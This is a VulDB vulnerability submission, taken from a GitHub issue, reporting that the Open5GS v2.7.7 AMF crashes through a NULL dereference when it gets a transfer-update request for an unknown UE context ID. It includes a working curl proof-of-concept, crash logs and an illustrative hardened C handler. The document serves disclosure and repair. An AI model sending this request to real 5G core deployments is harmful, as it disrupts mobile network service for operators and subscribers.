Submit #804291: Open5GS AMF V2.7.7 Denial of Service

Title: Open5GS AMF V2.7.7 Denial of Service
Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

AMF crashes when it receives `POST /namf-comm/v1/ue-contexts/{ueContextId}/transfer-update` for an unknown `ueContextId`. The request reaches `amf_namf_comm_handle_registration_status_update_request()`. If `amf_ue_find_by_ue_context_id()` fails, the handler sets `404`, formats `"Cannot find Context ID [...]"`, jumps to `cleanup`, and then unconditionally dereferences `amf_ue`, which is still `NULL`, at open5gs/src/amf/namf-handler.c:1960. This is externally reachable over the Namf_Communication SBI interface and causes process termination instead of returning a normal error response.

Relevant code:

- open5gs/src/amf/namf-handler.c:1858 resolves `ueContextId` with `amf_ue_find_by_ue_context_id()`.
- open5gs/src/amf/namf-handler.c:1859 handles the unknown-context path and jumps to `cleanup`.
- open5gs/src/amf/namf-handler.c:1955 logs `Cannot find Context ID [...]`.
- open5gs/src/amf/namf-handler.c:1960 dereferences `amf_ue` after cleanup even though it is `NULL`.

### Steps to reproduce

1. Start the official Open5GS v2.7.7 Docker deployment and make sure the AMF SBI endpoint is reachable. In my live setup on 2026-04-12 the AMF container was `amf` and the SBI endpoint was `http://10.33.33.8:80`.
2. Send the following HTTP/2 request:

   ```bash
   curl --http2-prior-knowledge -m 5 -sS -i \
     -X POST http://10.33.33.8/namf-comm/v1/ue-contexts/abc/transfer-update \
     -H 'content-type: application/json' \
     --data '{"transferStatus":"NOT_TRANSFERRED"}'
   ```

3. Check the AMF container state and logs:

   ```bash
   docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
   docker logs --tail 120 amf
   ```

### Logs

```text
Open5GS daemon v2.7.7
04/12 14:02:05.510: [app] INFO: Configuration: '/etc/open5gs/custom/amf.yaml' (../lib/app/ogs-init.c:144)
04/12 14:02:05.510: [app] INFO: File Logging: '/var/log/open5gs/amf.log' (../lib/app/ogs-init.c:147)
04/12 14:02:05.521: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/context.c:451)
04/12 14:02:05.523: [sbi] INFO: NF Service [namf-comm] (../lib/sbi/context.c:1985)
04/12 14:02:05.540: [sbi] INFO: nghttp2_server() [http://amf.open5gs.org]:80 (../lib/sbi/nghttp2-server.c:434)
04/12 14:02:05.540: [amf] INFO: ngap_server() [10.33.33.8]:38412 (../src/amf/ngap-sctp.c:61)
04/12 14:02:05.541: [sctp] INFO: AMF initialize...done (../src/amf/app.c:33)
04/12 14:02:05.558: [sbi] INFO: [300a5fba-3678-41f1-9eea-2fb555c553f9] NF registered [Heartbeat:10s] (../lib/sbi/nf-sm.c:341)
04/12 14:02:05.562: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/12 14:02:05.562: [sbi] INFO: [3011214c-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560085+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/12 14:02:05.562: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/12 14:02:05.562: [sbi] INFO: [30112520-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560161+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/12 14:02:05.563: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/12 14:02:05.563: [sbi] INFO: [30112746-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560213+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/12 14:02:05.563: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/12 14:02:05.563: [sbi] INFO: [301136be-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560619+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/12 14:02:05.563: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/12 14:02:05.563: [sbi] INFO: [30113a74-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560703+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/12 14:02:05.563: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/12 14:02:05.563: [sbi] INFO: [30113cea-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560765+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/12 14:02:05.563: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/12 14:02:05.563: [sbi] INFO: [30113f60-3678-41f1-a1a7-9bea98579840] Subscription created until 2026-04-13T14:02:05.560828+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/12 14:02:05.564: [sbi] INFO: [454c6e9c-3644-41f1-a93f-e1505117bc41] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81)
04/12 14:02:05.564: [sbi] INFO: [AUSF] NFInstance associated [454c6e9c-3644-41f1-a93f-e1505117bc41] (../lib/sbi/context.c:2441)
04/12 14:02:05.564: [sbi] INFO: Setup NF EndPoint(fqdn) [ausf.open5gs.org:0] (../lib/sbi/context.c:2446)
04/12 14:02:05.564: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.4:80] (../lib/sbi/context.c:2446)
04/12 14:02:05.564: [sbi] INFO: [nausf-auth] NFService associated [454cca90-3644-41f1-a93f-e1505117bc41] (../lib/sbi/context.c:2109)
04/12 14:02:05.564: [sbi] INFO: Setup NF EndPoint(fqdn) [ausf.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 14:02:05.564: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.4:80] (../lib/sbi/context.c:2111)
04/12 14:02:05.565: [sbi] INFO: [4568f3be-3644-41f1-bff0-3b335fd843b5] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81)
04/12 14:02:05.565: [sbi] INFO: [UDM] NFInstance associated [4568f3be-3644-41f1-bff0-3b335fd843b5] (../lib/sbi/context.c:2441)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2446)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.5:80] (../lib/sbi/context.c:2446)
04/12 14:02:05.565: [sbi] INFO: [nudm-ueau] NFService associated [45694328-3644-41f1-bff0-3b335fd843b5] (../lib/sbi/context.c:2109)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.5:80] (../lib/sbi/context.c:2111)
04/12 14:02:05.565: [sbi] INFO: [nudm-uecm] NFService associated [45694382-3644-41f1-bff0-3b335fd843b5] (../lib/sbi/context.c:2109)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.5:80] (../lib/sbi/context.c:2111)
04/12 14:02:05.565: [sbi] INFO: [nudm-sdm] NFService associated [456943be-3644-41f1-bff0-3b335fd843b5] (../lib/sbi/context.c:2109)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.5:80] (../lib/sbi/context.c:2111)
04/12 14:02:05.565: [sbi] INFO: [45a89546-3644-41f1-bcd4-3da7206b6e6f] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81)
04/12 14:02:05.565: [sbi] INFO: [SMF] NFInstance associated [45a89546-3644-41f1-bcd4-3da7206b6e6f] (../lib/sbi/context.c:2441)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [smf.open5gs.org:0] (../lib/sbi/context.c:2446)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.6:80] (../lib/sbi/context.c:2446)
04/12 14:02:05.565: [sbi] INFO: [nsmf-pdusession] NFService associated [45ac2788-3644-41f1-bcd4-3da7206b6e6f] (../lib/sbi/context.c:2109)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(fqdn) [smf.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 14:02:05.565: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.6:80] (../lib/sbi/context.c:2111)
04/12 14:02:17.232: [amf] ERROR: Unsupported UE context ID type (../src/amf/context.c:2118)
04/12 14:02:17.232: [amf] ERROR: Cannot find Context ID [abc] (../src/amf/namf-handler.c:1955)
/usr/local/bin/entrypoint.sh: line 10: 7 Segmentation fault (core dumped) open5gs-amfd "${@}"
```

### Expected behaviour

AMF should reject the request with a normal HTTP error such as `400 Bad Request` or `404 Not Found`, and the AMF process should remain running.

### Observed Behaviour

The TCP connection is reset, no HTTP error response is returned to the client, and the AMF process exits with code `139` due to a segmentation fault.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.
Source: https://github.com/open5gs/open5gs/issues/4399
User: ZiyuLin (UID 93568)
Submission: 14.04.2026 10:49 (2 months ago)
Moderation: 30.04.2026 20:17 (16 days later)
Status: Accepted
VulDB Entry: 360352 [Open5GS up to 2.7.7 transfer-update ueContextId Denial of Service]
Points: 20
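The error-path NULL dereference the report describes, shown as an added C example with the guard that turns the crash into a plain 404; this is not Open5GS's code. `amf_ue_t`, `find_ue_by_context_id()`, `response_t`, `probe()` and the sample id `imsi-001010000000001` are hypothetical stand-ins for the real AMF structures and for `amf_ue_find_by_ue_context_id()`, and what the real `cleanup` label touches is assumed rather than taken from namf-handler.c.

```c
#include <stdio.h>
#include <string.h>
/* Hypothetical stand-in for the AMF UE context; not Open5GS's real struct. */
typedef struct { char ue_context_id[40]; int transfer_status_updated; } amf_ue_t;

/* Constructed sample table of known UE contexts (one entry). */
static amf_ue_t g_ue_table[] = { { "imsi-001010000000001", 0 } };

/* Stand-in for amf_ue_find_by_ue_context_id(): NULL when the id is unknown. */
static amf_ue_t *find_ue_by_context_id(const char *id) {
    for (size_t i = 0; i < sizeof g_ue_table / sizeof g_ue_table[0]; i++)
        if (strcmp(g_ue_table[i].ue_context_id, id) == 0)
            return &g_ue_table[i];
    return NULL;
}

/* status: HTTP status to send; detail: ProblemDetails text; log_line: cleanup record. */
typedef struct { int status; char detail[96]; char log_line[96]; } response_t;

/* Hardened version of the flow the report describes: the 404 path reaches
 * `cleanup` with amf_ue == NULL, so every use after the label is guarded. */
static int handle_transfer_update(const char *ue_context_id, response_t *rsp) {
    amf_ue_t *amf_ue = find_ue_by_context_id(ue_context_id);
    rsp->status = 200;
    rsp->detail[0] = '\0';
    if (!amf_ue) {
        rsp->status = 404;
        snprintf(rsp->detail, sizeof rsp->detail,
                 "Cannot find Context ID [%s]", ue_context_id);
        goto cleanup;
    }
    amf_ue->transfer_status_updated = 1;   /* normal path: apply the update */

cleanup:
    /* Reading amf_ue->ue_context_id unconditionally here is the NULL
     * dereference the report describes; the null check is the fix. */
    snprintf(rsp->log_line, sizeof rsp->log_line, "transfer-update ue=%s status=%d",
             amf_ue ? amf_ue->ue_context_id : "(unknown)", rsp->status);
    return rsp->status;
}

/* Test hook: run the handler into a shared response and return the status. */
static response_t g_last;
static int probe(const char *id) { return handle_transfer_update(id, &g_last); }

int main(void) {
    probe("abc");   /* the report's unknown id: 404 and the process keeps running */
    printf("%d %s | %s\n", g_last.status, g_last.detail, g_last.log_line);
    return 0;
}
```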
